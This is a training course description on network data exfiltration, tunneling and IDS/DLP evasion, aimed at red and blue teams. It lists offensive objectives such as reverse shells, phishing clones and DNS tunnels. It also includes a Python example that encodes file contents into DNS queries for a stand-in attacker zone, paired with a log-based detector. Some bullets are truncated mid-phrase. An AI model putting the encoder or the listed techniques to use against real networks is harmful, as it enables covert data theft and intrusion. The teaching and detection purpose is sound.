The Post Exploitation Adversary Simulations – Network Data Exfiltration Techniques training class has been designed to present students with the modern and emerging tools and techniques available for network data exfiltration, testing and bypassing DLP/IDS/IPS/FW systems, protocol tunneling, hiding, pivoting and generating malicious network events. Highly technical content and a strictly hands-on approach ensure that applying the transferred knowledge and technologies in real production environments will be easy, smooth and repeatable.
As an introduction we will cover the latest APT-style campaigns using malware samples, analyze the top C2 network communication techniques seen in the wild and map the findings directly to the ATT&CK Framework, kill chain methodology and defense in depth strategy. We will also go briefly (with live examples, of course!) through the importance of network baselining, memory forensics, automated malware analysis systems and finally the real threat simulation tactics, which are the key aspects of this training.
Next, we will deep dive into the individual network protocols, services and techniques commonly used by adversaries in corporate networks and discuss their characteristic detection features. Using the available set of tools (more than 50 different tools and frameworks – check the Keywords section list below), the student will work one by one through well-prepared exfiltration, pivoting and tunneling use-cases to generate the true network symptoms of modern attacker behavior.
Who Should Attend:
- Red and Blue team members
- Security / Data Analysts
- CIRT / Incident Response Specialists
- Network Security Engineers
- SOC members and SIEM Engineers
- AI / Machine Learning Developers
- Chief Security Officers and IT Security Directors
Prerequisites:
- Fundamental knowledge of TCP/IP network protocols
- Penetration testing experience performing enumeration, exploitation and lateral movement is beneficial, but not required
- Basic programming skills are a plus, but not essential
- At least 20GB of free disk space
- At least 8GB of RAM
- Students should have the latest VirtualBox installed on their machine
- Full Admin access on your laptop
Key Learning Objectives:
We will explore in details how to:
- run different types of TCP/UDP reverse and bind shells across Windows and Linux systems, pivot to the next subnets, configure port forwarding and proxying, and find out which network traffic artifacts such actions leave behind
- manually craft single malicious packets, e.g. to saturate a DHCP server's address pool using Python, flood a network service from C code or start a brute-force attack using hydra or medusa
- generate your own malicious payloads and raw TCP/UDP custom encrypted traffic channels designed to evade security products
- simulate DNS DGA traffic, run DNS TXT tunnels and remote shells, exfiltrate data using DNS MX records and learn how to get Internet access on the plane or in the hotel for free!
- clone, armor and phish popular websites
- build a covert channel that drips a large file out in small ICMP packets, and monitor ICMP traffic
- use different HTTP headers and methods for stealing data, also in combination with web application injection techniques, and walk through the world of
- detect and understand TLS/SSL-based anomalies and exfiltration methods
- run PowerShell scripts in the post-exploitation stage for leaking data and bypass
- cheat security platforms by running internal WMI, WebSockets, VoIP or P2P covert
- hide stolen data in a binary file, WAV file or image file, or exfiltrate data from an air-gapped system using hops
- configure the station to connect to anonymizers like an external VPN, TOR or an open proxy and 'ping' the IPs/domains tagged on globally recognized security feeds, rules or phishy lists
- use popular cloud-based services for C2 communication and data stealing, e.g. Pastebin, Twitter, AWS and many more
- replay malicious PCAP files, analyze them in terms of network behaviour and analyze malware samples using Cuckoo
- understand how the syntax of signature-based rules works, how Suricata or Bro IDS can help you detect adversary tactics and what the differences between these two IDS engines are
- and combinations of many, many more.
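The DNS exfiltration objective and the detection objective above are two sides of the same traffic. The following is an added example, not course material or any of the listed tools: the attacker side packs a file into DNS names under a hypothetical attacker-controlled zone (exfil.example.test, assumed here) and reassembles it, and the defender side runs three cheap checks over a constructed query log in an assumed "<timestamp> <client_ip> <qtype> <qname>" format. The point it makes beyond the bullet list is that the RFC 1035 label and name limits force the sender into exactly the shape (long labels, many unique names, high-entropy labels) that a baseline-aware detector keys on.

```python
"""DNS subdomain exfiltration encoder/decoder plus a small log-based detector.

Added example for illustration; zone name and log format are assumptions,
and the log below is constructed, not captured traffic.
"""
import base64
import math
from collections import Counter, defaultdict

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a full name is at most 253 octets in text form
ZONE = "exfil.example.test"  # hypothetical attacker-controlled zone


def encode_chunks(data: bytes, zone: str = ZONE) -> list[str]:
    """Split data into names of the form <seq>.<base32 payload>.<zone>.

    base32 is used instead of base64 because DNS names are case-insensitive
    and resolvers may change letter case in transit, which would corrupt
    base64. Every chunk gets a fresh name so resolver caching cannot swallow
    repeated queries; the sequence label lets the receiver reorder them."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    names = []
    for seq, i in enumerate(range(0, len(b32), MAX_LABEL)):
        name = f"{seq}.{b32[i:i + MAX_LABEL]}.{zone}"
        if len(name) > MAX_NAME:
            raise ValueError("zone too long to carry a full payload label")
        names.append(name)
    return names


def decode_chunks(names: list[str], zone: str = ZONE) -> bytes:
    """Reassemble the payload from queries that may arrive out of order."""
    suffix = "." + zone
    parts = []
    for name in names:
        if not name.endswith(suffix):
            continue  # a query for some other zone, ignore it
        seq, payload = name[: -len(suffix)].split(".", 1)
        parts.append((int(seq), payload))
    b32 = "".join(p for _, p in sorted(parts)).upper()
    b32 += "=" * (-len(b32) % 8)  # restore the padding the sender stripped
    return base64.b32decode(b32)


def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character of one label."""
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Crude 'last two labels' heuristic; a real detector should use the
    public suffix list, but this is enough for the constructed log."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyze_log(lines, long_label=40, max_entropy=4.0, unique_names=8):
    """Return {client_ip: set(reasons)} for clients whose queries look like
    the encoder above: very long labels, high-entropy labels, or many
    distinct names under one registered domain."""
    flagged = {}
    per_domain = defaultdict(set)
    for line in lines:
        _ts, client, _qtype, qname = line.split()
        labels = qname.rstrip(".").split(".")
        longest = max(labels, key=len)
        reasons = []
        if len(longest) >= long_label:
            reasons.append("long_label")
        if len(longest) >= 16 and label_entropy(longest) >= max_entropy:
            reasons.append("high_entropy")
        per_domain[(client, registered_domain(qname))].add(qname)
        if reasons:
            flagged.setdefault(client, set()).update(reasons)
    for (client, dom), names in per_domain.items():
        if len(names) >= unique_names:
            flagged.setdefault(client, set()).add(f"many_subdomains:{dom}")
    return flagged


# Constructed sample: a fake /etc/passwd-like blob leaves 10.0.0.7, while
# 10.0.0.5 only resolves a few ordinary names.
SECRET = b"root:x:0:0:root:/root:/bin/bash\n" * 20
CONSTRUCTED_LOG = [
    "2024-03-01T09:00:01 10.0.0.5 A www.example.com",
    "2024-03-01T09:00:02 10.0.0.5 A mail.example.com",
    "2024-03-01T09:00:03 10.0.0.5 AAAA cdn.example.com",
] + [f"2024-03-01T09:01:{i:02d} 10.0.0.7 A {n}"
     for i, n in enumerate(encode_chunks(SECRET))]

if __name__ == "__main__":
    assert decode_chunks(encode_chunks(SECRET)) == SECRET
    for client, reasons in analyze_log(CONSTRUCTED_LOG).items():
        print(client, sorted(reasons))
```

Running the file reassembles the blob and flags only 10.0.0.7, with "long_label" and "many_subdomains:example.test" among the reasons. The thresholds are the part a practitioner has to tune against a real baseline: legitimate CDN and anti-spam names also produce long, high-entropy labels, so the unique-name count per client and domain is usually the most reliable single signal for a slow, low-volume tunnel.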
Through hands-on lab exercises, this training gives you the bigger picture of what you really need to care about when first building or later improving your SOC environment, your Red and Blue team skills, your SIEM deployments, your DLP/IDS/IPS installations or your machine-learning and anomaly detection security solutions.
The whole training described above is pure hands-on laboratory work, where each student runs every single action or chained scenario on their own in a dedicated virtual-lab network.
This class will focus on the x86/x64 architecture, IPv4/IPv6 networks and Linux and Windows target environments. In terms of IDS/IPS/Data Leakage Protection, and for a better understanding of the current status of your network security posture, the training will help you understand risks and identify network security blind spots and unexpected, uncovered areas by simulating real, offensive cyber adversary network behavior. Become confident that your network security really works!